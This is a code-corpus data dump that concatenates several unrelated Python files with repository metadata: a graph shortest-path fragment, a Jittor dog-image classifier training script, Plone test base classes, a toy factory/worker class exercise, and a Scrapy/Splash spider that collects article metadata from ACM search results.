for neighbor in [nb for nb in HG[k] if nb not in final_dist]:
nw = final_dist[k] + 1.00 / HG[k][neighbor]
if neighbor not in dist_so_far or nw < dist_so_far[neighbor]:
dist_so_far[neighbor] = nw
route_cnt[neighbor] = route_cnt[k] + 1
heapq.heappush(heap, (final_dist[k] + 1.00 / HG[k][neighbor], neighbor))
return route_cnt, final_dist
def sub_test():
(marvelG, characters) = ({
'A': {'AB_book', 'AC_book', 'ABCD_book', 'AB_book2'},
'AB_book': {'A', 'B'},
'AB_book2': {'A', 'B'},
'B': {'AB_book', 'BD_book', 'ABCD_book', 'AB_book2'},
'BD_book': {'B', 'D'},
'D': {'BD_book', 'CD_book', 'ABCD_book'},
'CD_book': {'C', 'D'},
'C': {'CD_book', 'AC_book', 'ABCD_book'},
'AC_book': {'A', 'C'},
'ABCD_book': {'A', 'B', 'C', 'D'}
}, {'A': 1, 'B': 1, 'C': 1, 'D': 1})
HG = make_hop_graph(marvelG, characters)
(WG, w_routes) = make_weight_graph(HG, characters)
print HG
print WG
print w_routes
count = 0
for ch1 in w_routes:
for ch2 in w_routes[ch1]:
if ch1 != ch2 and 1 != w_routes[ch1][ch2]:
count += 1
print count
def test():
(marvelG, characters) = read_graph('marvel_graph')
HG = make_hop_graph(marvelG, characters)
(WG, w_routes) = make_weight_graph(HG, characters)
count = 0
for ch1 in w_routes:
for ch2 in w_routes[ch1]:
if ch1 != ch2 and 1 != w_routes[ch1][ch2]:
count += 1
print count
sub_test()
test()
| [
"="
] | = |
03c7db3d432555998947878d40132af841780c83 | 57ef48cbc61bc3bf890088ec24a50c440bc36072 | /dogflb/train-tiny.py | 5abdd5e1943352ec94cd42ee7dac641ef5b1603d | [] | no_license | ShenDezhou/CAIL2021 | 8be1ea07dd47085126b9092998de72dc0c70973d | aab19b42e9ea1ba29158df577087e827419adae8 | refs/heads/master | 2023-03-28T11:17:09.541712 | 2021-03-29T14:11:40 | 2021-03-29T14:11:40 | 328,170,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,373 | py | import os
import jittor as jt
import jittor.nn as nn
from dataset import TsinghuaDog
from jittor import transform
from jittor.optim import Adam, SGD
from tqdm import tqdm
import numpy as np
from model import Net
import argparse
jt.flags.use_cuda=1
def get_path(path):
"""Create the path if it does not exist.
Args:
path: path to be used
Returns:
Existed path
"""
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
return path
def train(model, train_loader, optimizer, epoch):
model.train()
total_acc = 0
total_num = 0
losses = 0.0
pbar = tqdm(train_loader, desc=f'Epoch {epoch} [TRAIN]')
for images, labels in pbar:
output = model(images)
loss = nn.cross_entropy_loss(output, labels)
optimizer.step(loss)
pred = np.argmax(output.data, axis=1)
acc = np.mean(pred == labels.data) * 100
total_acc += acc
total_num += labels.shape[0]
losses += loss
pbar.set_description(f'Epoch {epoch} [TRAIN] loss = {loss.data[0]:.2f}, acc = {acc:.2f}')
best_acc = -1.0
def evaluate(model, val_loader, epoch=0, save_path='./best_model.bin'):
model.eval()
global best_acc
total_acc = 0
total_num = 0
pbar = tqdm(val_loader, desc=f'Epoch {epoch} [EVAL]')
for images, labels in pbar:
output = model(images)
pred = np.argmax(output.data, axis=1)
acc = np.sum(pred == labels.data)
total_acc += acc
total_num += labels.shape[0]
pbar.set_description(f'Epoch {epoch} [EVAL] acc = {total_acc / total_num :.2f}')
acc = total_acc / total_num
if acc > best_acc:
best_acc = acc
get_path(save_path)
model.save(save_path)
print ('Test in epoch', epoch, 'Accuracy is', acc, 'Best accuracy is', best_acc)
#python train-tiny.py --epochs 5 --batch_size 32 --dataroot /mnt/data/dogfldocker --model_path model/res50/model.bin --resume False
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--batch_size', type=int, default=32)
parser.add_argument('--epochs', type=int, default=50)
parser.add_argument('--num_classes', type=int, default=130)
parser.add_argument('--lr', type=float, default=2e-3)
parser.add_argument('--weight_decay', type=float, default=1e-5)
parser.add_argument('--resume', type=bool, default=False)
parser.add_argument('--eval', type=bool, default=False)
parser.add_argument('--dataroot', type=str, default='/content/drive/MyDrive/dogflg/data2/')
parser.add_argument('--model_path', type=str, default='./best_model.bin')
parser.add_argument('--sampleratio', type=float, default=0.8)
args = parser.parse_args()
transform_train = transform.Compose([
transform.Resize((256, 256)),
transform.CenterCrop(224),
transform.RandomHorizontalFlip(),
transform.ToTensor(),
transform.ImageNormalize(0.485, 0.229),
# transform.ImageNormalize(0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
])
root_dir = args.dataroot
train_loader = TsinghuaDog(root_dir, batch_size=args.batch_size, train=True, part='train', shuffle=True, transform=transform_train, sample_rate=args.sampleratio)
transform_test = transform.Compose([
transform.Resize((256, 256)),
transform.CenterCrop(224),
transform.ToTensor(),
transform.ImageNormalize(0.485, 0.229),
# transform.ImageNormalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
])
val_loader = TsinghuaDog(root_dir, batch_size=args.batch_size, train=False, part='val', shuffle=False, transform=transform_test, sample_rate=args.sampleratio)
epochs = args.epochs
model = Net(num_classes=args.num_classes)
lr = args.lr
weight_decay = args.weight_decay
optimizer = SGD(model.parameters(), lr=lr, momentum=0.99)
if args.resume:
model.load(args.model_path)
print('model loaded', args.model_path)
#random save for test
#model.save(args.model_path)
if args.eval:
evaluate(model, val_loader, save_path=args.model_path)
return
for epoch in range(epochs):
train(model, train_loader, optimizer, epoch)
evaluate(model, val_loader, epoch, save_path=args.model_path)
if __name__ == '__main__':
main()
| [
"bangtech@sina.com"
] | bangtech@sina.com |
9ef838759387609b5be7812eeda6c96df2a63f72 | 1cb8f578fab815e7031b9302b809d2fce1bad56f | /plone/app/s5slideshow/tests/base.py | 25e2d02fbf315c5cee64b5438058531f37813840 | [] | no_license | toutpt/plone.app.s5slideshow | 103856fdefc6504193e9d5b981fa377c7c5ace1a | ee2129c3e40cc03fadad2490730100ad715f5395 | refs/heads/master | 2020-06-04T15:18:27.754687 | 2012-02-28T07:52:39 | 2012-02-28T07:52:39 | 3,160,939 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,002 | py | import unittest2 as unittest
from zope import interface
from plone.app import testing
from plone.app.s5slideshow.tests import layer
class UnitTestCase(unittest.TestCase):
def setUp(self):
super(UnitTestCase, self).setUp()
class TestCase(unittest.TestCase):
layer = layer.INTEGRATION
def setUp(self):
from ZPublisher.tests.testPublish import Request
super(TestCase, self).setUp()
self.portal = self.layer['portal']
self.request = Request()
class FunctionalTestCase(unittest.TestCase):
layer = layer.FUNCTIONAL
def setUp(self):
super(FunctionalTestCase, self).setUp()
self.portal = self.layer['portal']
testing.setRoles(self.portal, testing.TEST_USER_ID, ['Manager'])
testing.setRoles(self.portal, testing.TEST_USER_ID, ['Member'])
def build_test_suite(test_classes):
suite = unittest.TestSuite()
for klass in test_classes:
suite.addTest(unittest.makeSuite(klass))
return suite
| [
"toutpt@gmail.com"
] | toutpt@gmail.com |
18821b556650d403c0a02ae62e4c2f09bc774a23 | 51fb5fe41a2c5030fb9e46a029f80e8b637714f3 | /factory_app/factory.py | be6e96c991075f0550c8462cc83bba811227800a | [] | no_license | aliensmart/week2_day3 | 6c7512c77c09424c87cdd64fe634b23ae54ffa21 | 21125022850c398aa0b68295f2e40ca18c573f13 | refs/heads/master | 2020-07-13T05:31:44.581603 | 2019-08-29T19:25:27 | 2019-08-29T19:25:27 | 205,004,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,503 | py | #!/usr/bin/env python3
#Class
# Worker
# Item
# Factory
class Worker:
#attribute:
# name
# job
# years
# department is None
def __init__(self, name, job, years):
self.name = name
self.job = job
self.years = years
self.department = None
#Create methods set_department and increase_tenure
def set_department(self,depart):
"""
will take in a string,
and re-assign the worker's
department for the day
"""
self.department = depart
def increase_tenure(self):
"""
will add one year to the number
of years this worker has been
at the factory.
"""
self.years +=1
class Item:
#Attributes:
#name
#explosive
#weight
#cost
def __init__(self, name, explosive, weight, cost):
self.name = name
self.explosive = explosive
self.weight = weight
self.cost = cost
#create method explod
def explode(self):
"""
If explosive == True, our method
will print Boom!
"""
if self.explosive == True:
return "Boom"
battery = Item("battery", True, "4lbs", 200.99)
class Factory:
#attribut:
# workers is the list of worker obj
# products is the list of items
# days_since_last_incident
def __init__(self, workers = [], products =[]):
self.workers = workers
self.products = products
self.days_since_last_incident = 0
#method need:
# add_worker
# create_product
# ship
# add_day
# incident
def add_worker(self, worker):
"""
add a Worker object to our
self.workers list
"""
self.workers.append(worker)
def create_product(self, item):
"""
add an Item object to our
self.products list
"""
self.products.append(item)
def ship(self):
"""
should remove everything from our current
"""
self.products = []
def add_day(self):
"""
should add 1 to our
self.days_without_incident attribute
"""
self.days_since_last_incident +=1
def incident(self):
"""
re-assign self.days_without_incident to 0
"""
self.days_since_last_incident = 0
| [
"kaoua17@gmail.com"
] | kaoua17@gmail.com |
34eb6021b51846ce284b8d310da82c2d4e56b2e5 | e905abd9bb7bd7017657d0a0c4d724d16e37044c | /.history/article/spiders/acm_20201230145258.py | 2bfa13a12a05f543b22b93f69e8ea2d0698e1dd7 | [] | no_license | tabdelbari/articles | a8b921841f84fb473f5ed1cdcda743863e6bc246 | f0e1dfdc9e818e43095933139b6379a232647898 | refs/heads/main | 2023-03-05T10:21:35.565767 | 2021-02-10T13:35:14 | 2021-02-10T13:35:14 | 325,654,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,360 | py | import scrapy
import logging
import re
from scrapy_splash import SplashRequest
from article.items import ArticleItem
class AcmSpider(scrapy.Spider):
name = 'acm'
allowed_domains = ['acm.org']
def __init__(self, topic='', keywords='', **kwargs):
super().__init__(**kwargs)
self.start_urls = ['https://dl.acm.org/action/doSearch?AllField=%s' %keywords]
self.topic = topic
def start_requests(self):
for url in self.start_urls:
yield SplashRequest(url, callback=self.find_articles, args={ 'wait': 10 })
def find_articles(self, response):
# logging.info(response.text)
articles_urls = response.xpath('.//*/div[contains(@class,"issue-item")]/*/h5/span/a/@href').getall()
logging.info(f'{len(articles_urls)} articles found')
for url in articles_urls:
article_url = 'https://dl.acm.org' + url
yield SplashRequest(article_url, callback=self.parse, args={ 'wait': 10 })
next_page = response.xpath('.//*/nav[contains(@class, "pagination")]/span/a[@title="Next Page"]/@href').get(default='')
logging.info('Next page found:')
if next_page != '':
yield SplashRequest(next_page, callback=self.find_articles, args={ 'wait': 10 })
def parse(self, response):
logging.info('Processing --> ' + response.url)
article = ArticleItem()
result = {
'title' : '',
'authors': '',
'country': '',
'abstract': '',
'date_pub': '',
'journal': '',
}
article['title'] = response.xpath('//*/article/*/div[@class="citation"]/div/h1[@class="citation__title"]').get(default='')
authors = response.xpath('//*/div[@class="citation"]/div/div/ul/li/a/@title').getall()
article['authors'] = '|'.join(authors)
article['country'] = ''
article['abstract'] = response.xpath('//*/div[contains(@class,"abstractSection")]/p').get(default='')
article['date_pub'] = response.xpath('//*/span[@class="epub-section__date"]').get(default='')
article['journal'] = response.xpath('//*/span[@class="epub-section__title"]').get(default='')
article['topic'] = self.topic
article['latitude'] = ''
article['longitude'] = ''
yield article
| [
"abdelbari1996@hotmail.com"
] | abdelbari1996@hotmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.